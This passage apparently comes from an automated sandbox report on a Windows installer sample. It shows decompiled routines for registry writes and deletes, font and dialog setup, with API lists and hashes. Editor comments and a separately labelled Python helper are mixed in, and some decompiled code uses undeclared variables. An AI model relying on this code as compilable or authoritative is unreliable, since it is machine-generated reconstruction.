                                                                                    				void* _t15;
                                                                                    				char* _t18;
                                                                                    				int _t19;
                                                                                    				char _t24;
                                                                                    				int _t27;
                                                                                    				intOrPtr _t35;
                                                                                    				void* _t37;
                                                                                    
                                                                                    				_t15 = E00402B1E(__eax);
                                                                                    				_t35 =  *((intOrPtr*)(_t37 - 0x18));
                                                                                    				 *(_t37 - 0x34) =  *(_t37 - 0x14);
                                                                                    				 *(_t37 - 0x38) = E00402A29(2);
                                                                                    				_t18 = E00402A29(0x11);
                                                                                    				 *(_t37 - 4) = 1;
                                                                                    				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x42ecd0 | 0x00000002, _t27, _t37 + 8, _t27);
                                                                                    				if(_t19 == 0) {
                                                                                    					if(_t35 == 1) {
                                                                                    						E00402A29(0x23);
                                                                                    						_t19 = lstrlenA(0x40a440) + 1;
                                                                                    					}
                                                                                    					if(_t35 == 4) {
                                                                                    						_t24 = E00402A0C(3);
                                                                                    						 *0x40a440 = _t24;
                                                                                    						_t19 = _t35;
                                                                                    					}
                                                                                    					if(_t35 == 3) {
                                                                                    						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a440, 0xc00);
                                                                                    					}
                                                                                    					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a440, _t19) == 0) {
                                                                                    						 *(_t37 - 4) = _t27;
                                                                                    					}
                                                                                    					_push( *(_t37 + 8));
                                                                                    					RegCloseKey();
                                                                                    				}
                                                                                    				 *0x42eca8 =  *0x42eca8 +  *(_t37 - 4);
                                                                                    				return 0;
                                                                                    			}

                                                                                    0x00402337
                                                                                    0x0040233c
                                                                                    0x00402346
                                                                                    0x00402350
                                                                                    0x00402353
                                                                                    0x0040236d
                                                                                    0x00402374
                                                                                    0x0040237c
                                                                                    0x0040238a
                                                                                    0x0040238e
                                                                                    0x00402399
                                                                                    0x00402399
                                                                                    0x0040239d
                                                                                    0x004023a1
                                                                                    0x004023a7
                                                                                    0x004023ac
                                                                                    0x004023ac
                                                                                    0x004023b0
                                                                                    0x004023bc
                                                                                    0x004023bc
                                                                                    0x004023d5
                                                                                    0x004023d7
                                                                                    0x004023d7
                                                                                    0x004023da
                                                                                    0x004024b0
                                                                                    0x004024b0
                                                                                    0x004028c1
                                                                                    0x004028cd

                                                                                    APIs
                                                                                    • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402374
                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso7CE9.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402394
                                                                                    • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nso7CE9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CD
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso7CE9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024B0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CloseCreateValuelstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nso7CE9.tmp
                                                                                    • API String ID: 1356686001-1226934969
                                                                                    • Opcode ID: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                                                                    • Instruction ID: 7eaf0ec052d83a67d7bbddc98f61bbb11a40701f4c7c8ad3ea5d843478098636
                                                                                    • Opcode Fuzzy Hash: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                                                                    • Instruction Fuzzy Hash: 2211A271E00108BFEB10EFA5DE89EAF7678EB40758F20403AF505B31D0D6B85D019A69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 84%
                                                                                    			E00402A69(void* _a4, char* _a8, intOrPtr _a12) {
                                                                                    				void* _v8;
                                                                                    				char _v272;
                                                                                    				long _t18;
                                                                                    				intOrPtr* _t27;
                                                                                    				long _t28;
                                                                                    
                                                                                    				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x42ecd0 | 0x00000008,  &_v8);
                                                                                    				if(_t18 == 0) {
                                                                                    					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                                                    						if(_a12 != 0) {
                                                                                    							RegCloseKey(_v8);
                                                                                    							L8:
                                                                                    							return 1;
                                                                                    						}
                                                                                    						if(E00402A69(_v8,  &_v272, 0) != 0) {
                                                                                    							break;
                                                                                    						}
                                                                                    					}
                                                                                    					RegCloseKey(_v8);
                                                                                    					_t27 = E00405F57(4);
                                                                                    					if(_t27 == 0) {
                                                                                    						if( *0x42ecd0 != 0) {
                                                                                    							goto L8;
                                                                                    						}
                                                                                    						_t28 = RegDeleteKeyA(_a4, _a8);
                                                                                    						if(_t28 != 0) {
                                                                                    							goto L8;
                                                                                    						}
                                                                                    						return _t28;
                                                                                    					}
                                                                                    					return  *_t27(_a4, _a8,  *0x42ecd0, 0);
                                                                                    				}
                                                                                    				return _t18;
                                                                                    			}


                                                                                    APIs
                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A8A
                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1912718029-0
                                                                                    • Opcode ID: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                                                                    • Instruction ID: 1feb4b7649154eaa2fe5ae549c730efe0d3e9f21b7ed1b50a1ad382232646690
                                                                                    • Opcode Fuzzy Hash: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                                                                    • Instruction Fuzzy Hash: DF116A71600009FEDF21AF91DE89DAA3B79FB04354F104076FA05E00A0DBB99E51BF69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00401CDE(int __edx) {
                                                                                    				void* _t17;
                                                                                    				struct HINSTANCE__* _t21;
                                                                                    				struct HWND__* _t25;
                                                                                    				void* _t27;
                                                                                    
                                                                                    				_t25 = GetDlgItem( *(_t27 - 8), __edx);
                                                                                    				GetClientRect(_t25, _t27 - 0x50);
                                                                                    				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
                                                                                    				if(_t17 != _t21) {
                                                                                    					DeleteObject(_t17);
                                                                                    				}
                                                                                    				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t27 - 4));
                                                                                    				return 0;
                                                                                    			}


                                                                                    APIs
                                                                                    • GetDlgItem.USER32 ref: 00401CE2
                                                                                    • GetClientRect.USER32 ref: 00401CEF
                                                                                    • LoadImageA.USER32 ref: 00401D10
                                                                                    • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                    • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                    • String ID:
                                                                                    • API String ID: 1849352358-0
                                                                                    • Opcode ID: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                                                                    • Instruction ID: 7835fe8bf079333df41a7cdc3f5accb8fa20f3c3d3d5b8549a113c77ab23cea9
                                                                                    • Opcode Fuzzy Hash: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                                                                    • Instruction Fuzzy Hash: BDF0EC72A04118AFE701EBE4DE88DAFB77CEB44305B14443AF501F6190C7749D019B79
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 77%
                                                                                    			E00404678(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                    				char _v36;
                                                                                    				char _v68;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				signed int _t21;
                                                                                    				signed int _t22;
                                                                                    				void* _t29;
                                                                                    				void* _t31;
                                                                                    				void* _t32;
                                                                                    				void* _t41;
                                                                                    				signed int _t43;
                                                                                    				signed int _t47;
                                                                                    				signed int _t50;
                                                                                    				signed int _t51;
                                                                                    				signed int _t53;
                                                                                    
                                                                                    				_t21 = _a16;
                                                                                    				_t51 = _a12;
                                                                                    				_t41 = 0xffffffdc;
                                                                                    				if(_t21 == 0) {
                                                                                    					_push(0x14);
                                                                                    					_pop(0);
                                                                                    					_t22 = _t51;
                                                                                    					if(_t51 < 0x100000) {
                                                                                    						_push(0xa);
                                                                                    						_pop(0);
                                                                                    						_t41 = 0xffffffdd;
                                                                                    					}
                                                                                    					if(_t51 < 0x400) {
                                                                                    						_t41 = 0xffffffde;
                                                                                    					}
                                                                                    					if(_t51 < 0xffff3333) {
                                                                                    						_t50 = 0x14;
                                                                                    						asm("cdq");
                                                                                    						_t22 = 1 / _t50 + _t51;
                                                                                    					}
                                                                                    					_t23 = _t22 & 0x00ffffff;
                                                                                    					_t53 = _t22 >> 0;
                                                                                    					_t43 = 0xa;
                                                                                    					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                                                    				} else {
                                                                                    					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                                                    					_t47 = 0;
                                                                                    				}
                                                                                    				_t29 = E00405BE9(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                                                    				_t31 = E00405BE9(_t41, _t47, _t53,  &_v68, _t41);
                                                                                    				_t32 = E00405BE9(_t41, _t47, 0x42a0a0, 0x42a0a0, _a8);
                                                                                    				wsprintfA(_t32 + lstrlenA(0x42a0a0), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                                                    				return SetDlgItemTextA( *0x42e3f8, _a4, 0x42a0a0);
                                                                                    			}


                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                                                                    • wsprintfA.USER32 ref: 0040471E
                                                                                    • SetDlgItemTextA.USER32 ref: 00404731
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                    • String ID: %u.%u%s%s
                                                                                    • API String ID: 3540041739-3551169577
                                                                                    • Opcode ID: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                                                                    • Instruction ID: 062a34f2e1a42b9bac053d54189fda3392bb7b96bf994c182a5c545f77b0e815
                                                                                    • Opcode Fuzzy Hash: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                                                                    • Instruction Fuzzy Hash: CD110673A041282BEB00656D9C41EAF32D8DB86334F290637FA25F71D1E979EC1246E9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 51%
                                                                                    			E00401BCA() {
                                                                                    				signed int _t28;
                                                                                    				CHAR* _t31;
                                                                                    				long _t32;
                                                                                    				int _t37;
                                                                                    				signed int _t38;
                                                                                    				int _t42;
                                                                                    				int _t48;
                                                                                    				struct HWND__* _t52;
                                                                                    				void* _t55;
                                                                                    
                                                                                    				 *(_t55 - 8) = E00402A0C(3);
                                                                                    				 *(_t55 + 8) = E00402A0C(4);
                                                                                    				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
                                                                                    					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
                                                                                    				}
                                                                                    				__eflags =  *(_t55 - 0x14) & 0x00000002;
                                                                                    				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
                                                                                    					 *(_t55 + 8) = E00402A29(0x44);
                                                                                    				}
                                                                                    				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
                                                                                    				_push(1);
				if(__eflags != 0) {
					/* FindWindowEx path: the two E00402A29() calls resolve the class and window-name
					   strings; the inline sbb/and sequence evidently passes NULL in place of an empty string. */
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					/* SendMessage path: E00402A0C() yields the window handle and message id; the
					   operand at [ebp-0x14] carries the timeout in its upper bits (shift by 2 strips two flag bits). */
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						/* Timed variant: the reply is written to [ebp-0xc]; the sbb/neg sequence after the
						   call appears to reduce its return value to a 0/1 flag in [ebp-4] that is set when
						   the call returned 0 (failure or timeout) and is folded into the global counter below. */
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				/* When the destination operand at [ebp-0x28] is not negative, the result in [ebp-0xc]
				   is handed to E00405B25() for storage. */
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405B25();
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t55 - 4));   /* accumulate the error flag */
				return 0;
			}


                                                                                    APIs
                                                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Timeout
                                                                                    • String ID: !
                                                                                    • API String ID: 1777923405-2657877971
                                                                                    • Opcode ID: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                                                                    • Instruction ID: 4d3ef85e63b9541cbe972d5e7c3a425ff70263948fb1d71cee34ed50e591440d
                                                                                    • Opcode Fuzzy Hash: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                                                                    • Instruction Fuzzy Hash: B821A171A44149BEEF02AFF5C94AAEE7B75DF44704F10407EF501BA1D1DAB88A40DB29

                                                                                    C-Code - Quality: 100%
			/* Ensures the path in _a4 ends with a backslash: CharPrevA() steps back to the last
			   character (DBCS-safe), compares it with 0x5c ('\\') and, if it differs, appends the
			   string at 0x409010. The traced argument is C:\Users\user\AppData\Local\Temp\. */
			E004056BA(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);   /* lstrcatA() does no bounds check; the caller's buffer must have room */
				}
				return _t7;
			}

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C0
                                                                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C9
                                                                                    • lstrcatA.KERNEL32(?,00409010), ref: 004056DA
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004056BA
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 2659869361-3916508600
                                                                                    • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                    • Instruction ID: 80516fad0c4d4920465a9bb29442f27547f360336c83292ed6deef4f7ecf272a
                                                                                    • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                    • Instruction Fuzzy Hash: 88D0A962A09A302AE20223198C05F9B7AA8CF02351B080862F140B6292C27C3C818BFE

                                                                                    C-Code - Quality: 67%
			/* Fills the LOGFONTA global at 0x40b044 and creates the font. The written addresses
			   match the documented LOGFONTA layout: +0x10 lfWeight, +0x14 lfItalic, +0x15 lfUnderline,
			   +0x16 lfStrikeOut, +0x17 lfCharSet, +0x1c lfFaceName. */
			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				/* 0x5a == LOGPIXELSY; note that the DC obtained with GetDC() is never released here. */
				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				/* Standard point-size to cell-height conversion, lfHeight = -MulDiv(points, dpi, 72);
				   the decompiler renders the negation as ~. */
				0x40b044->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b054 = E00402A0C(3);             /* lfWeight */
				_t11 =  *((intOrPtr*)(_t28 - 0x18));   /* style flags byte */
				 *0x40b05b = 1;                        /* lfCharSet = DEFAULT_CHARSET */
				 *0x40b058 = _t11 & 0x00000001;        /* lfItalic */
				 *0x40b059 = _t11 & 0x00000002;        /* lfUnderline (stored as 2, still non-zero) */
				 *0x40b05a = _t11 & 0x00000004;        /* lfStrikeOut (stored as 4) */
				E00405BE9(_t18, _t24, _t26, 0x40b060,  *((intOrPtr*)(_t28 - 0x24)));   /* populate lfFaceName */
				_t14 = CreateFontIndirectA(0x40b044);
				_push(_t14);
				_push(_t26);
				E00405B25();                           /* same helper that stores results in the SendMessage handler above */
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

                                                                                    APIs
                                                                                    • GetDC.USER32(?), ref: 00401D3F
                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                                                                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                                                                    • CreateFontIndirectA.GDI32(0040B044), ref: 00401DA7
                                                                                    Similarity
                                                                                    • API ID: CapsCreateDeviceFontIndirect
                                                                                    • String ID:
                                                                                    • API String ID: 3272661963-0
                                                                                    • Opcode ID: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                                                                    • Instruction ID: d817c33c406d5a72f0d35d0353d877ca697365183e6ac762242a66cad999de2e
                                                                                    • Opcode Fuzzy Hash: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                                                                    • Instruction Fuzzy Hash: DFF06871A482C0AFE70167709F5AB9B3F64D712305F104476F251BA2E3C77D14448BAD
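The LOGFONTA field mapping and the lfHeight formula used by E00401D38 above, as an added worked example. This is editor-written Python, not code from the sandbox report or from the sample; it assumes the documented Win32 LOGFONTA layout and emulates MulDiv's round-to-nearest behaviour (both labelled in the code), and it takes only the base address 0x40b044 and the constant writes from the decompiled routine.

```python
"""
Added example (not part of the sandbox report or of the sample): maps the
absolute addresses written by E00401D38 onto the fields of a Win32 LOGFONTA
placed at 0x40b044, and reproduces lfHeight = -MulDiv(point_size, LOGPIXELSY, 72).
Field offsets follow the documented LOGFONTA layout; MulDiv rounding is emulated.
"""

LOGFONT_BASE = 0x40B044   # address of the LOGFONTA global in the sample (from the report)

# (name, offset, size) for LOGFONTA, assumed from the documented struct layout.
LOGFONTA_FIELDS = [
    ("lfHeight", 0x00, 4), ("lfWidth", 0x04, 4), ("lfEscapement", 0x08, 4),
    ("lfOrientation", 0x0C, 4), ("lfWeight", 0x10, 4), ("lfItalic", 0x14, 1),
    ("lfUnderline", 0x15, 1), ("lfStrikeOut", 0x16, 1), ("lfCharSet", 0x17, 1),
    ("lfOutPrecision", 0x18, 1), ("lfClipPrecision", 0x19, 1), ("lfQuality", 0x1A, 1),
    ("lfPitchAndFamily", 0x1B, 1), ("lfFaceName", 0x1C, 32),
]
LOGFONTA_SIZE = 0x3C   # sizeof(LOGFONTA) == 60


def field_at(addr, base=LOGFONT_BASE):
    """Return the LOGFONTA field covering absolute address `addr`, or None if outside the struct."""
    off = addr - base
    for name, start, size in LOGFONTA_FIELDS:
        if start <= off < start + size:
            return name
    return None


def muldiv(number, numerator, denominator):
    """Emulate Win32 MulDiv: exact product, rounded to the nearest integer (half away from zero)."""
    if denominator == 0:
        return -1                     # MulDiv's documented error return
    prod = number * numerator
    q, r = divmod(abs(prod), abs(denominator))
    if 2 * r >= abs(denominator):
        q += 1
    negative = (prod < 0) != (denominator < 0)
    return -q if negative else q


def lf_height(point_size, logpixelsy):
    """lfHeight as E00401D38 computes it: the negated MulDiv(points, dpi, 72) cell height."""
    return -muldiv(point_size, logpixelsy, 72)


def style_writes(style_byte):
    """Reproduce the four constant writes in E00401D38 for a given style flags byte.
    The masked bit is stored unnormalised (2 for underline, 4 for strikeout); any
    non-zero BYTE still reads as TRUE for CreateFontIndirectA."""
    return {
        0x40B058: style_byte & 1,   # lfItalic
        0x40B059: style_byte & 2,   # lfUnderline
        0x40B05A: style_byte & 4,   # lfStrikeOut
        0x40B05B: 1,                # lfCharSet = DEFAULT_CHARSET
    }


def decode_writes(writes, base=LOGFONT_BASE):
    """Map {absolute_address: value} writes, as seen in the decompiled code, to field names."""
    return {field_at(addr, base): value for addr, value in writes.items()}


if __name__ == "__main__":
    # Constructed input: a style byte with italic, underline and strikeout all set.
    print(decode_writes(style_writes(0b111)))
    print("12pt at 96 dpi -> lfHeight", lf_height(12, 96))
```

The mapping confirms that every hard-coded address in the routine lands on a distinct LOGFONTA field and that the byte at 0x40b05b is lfCharSet, which is why the constant 1 there means DEFAULT_CHARSET rather than an arbitrary flag.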

                                                                                    C-Code - Quality: 100%
			/* Lazily shows or tears down a dialog whose handle lives in the global *0x420c48:
			   _a4 == 0 creates resource dialog 0x6f (111) once GetTickCount() has passed the
			   deadline stored in *0x42ec2c, _a4 != 0 destroys it. */
			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x420c48; // 0x0
					if(__eflags == 0) {
						/* Not created yet: compare the 32-bit tick counter with the deadline
						   (unsigned compare; GetTickCount() wraps after roughly 49.7 days). */
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42ec2c;
						if(_t2 >  *0x42ec2c) {
							/* Modeless dialog with window procedure E00402B6E, then ShowWindow(SW_SHOW == 5). */
							_t3 = CreateDialogParamA( *0x42ec20, 0x6f, 0, E00402B6E, 0);
							 *0x420c48 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F93(0);   /* dialog already exists */
					}
				} else {
					_t6 =  *0x420c48; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420c48 = 0;
					return _t6;
				}
			}

                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                                                                                    • GetTickCount.KERNEL32 ref: 00402C22
                                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                                                                    Similarity
                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                    • String ID:
                                                                                    • API String ID: 2102729457-0
                                                                                    • Opcode ID: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                                                                    • Instruction ID: af7afb5c67b035eb61978086e86d3b64d4827bf2199b448f7584534e2ab44da5
                                                                                    • Opcode Fuzzy Hash: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                                                                    • Instruction Fuzzy Hash: 46F0E270A0D260ABC3746F66FE8C98F7BA4F744B017400876F104B11E9CA7858C68B9D

                                                                                    C-Code - Quality: 100%
                                                                                    			E004038E3(void* __ecx, void* __eflags) {
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				signed short _t6;
                                                                                    				intOrPtr _t11;
                                                                                    				signed int _t13;
                                                                                    				signed int _t16;
                                                                                    				signed short* _t18;
                                                                                    				signed int _t20;
                                                                                    				signed short* _t23;
                                                                                    				intOrPtr _t25;
                                                                                    				signed int _t26;
				intOrPtr* _t27;
				char* _t24;
                                                                                    
                                                                                    				_t24 = "1033";
                                                                                    				_t13 = 0xffff;
                                                                                    				_t6 = E00405B3E(__ecx, "1033");
                                                                                    				while(1) {
                                                                                    					_t26 =  *0x42ec64;
                                                                                    					if(_t26 == 0) {
                                                                                    						goto L7;
                                                                                    					}
                                                                                    					_t16 =  *( *0x42ec30 + 0x64);
                                                                                    					_t20 =  ~_t16;
                                                                                    					_t18 = _t16 * _t26 +  *0x42ec60;
                                                                                    					while(1) {
                                                                                    						_t18 = _t18 + _t20;
                                                                                    						_t26 = _t26 - 1;
                                                                                    						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                                                    							break;
                                                                                    						}
                                                                                    						if(_t26 != 0) {
                                                                                    							continue;
                                                                                    						}
                                                                                    						goto L7;
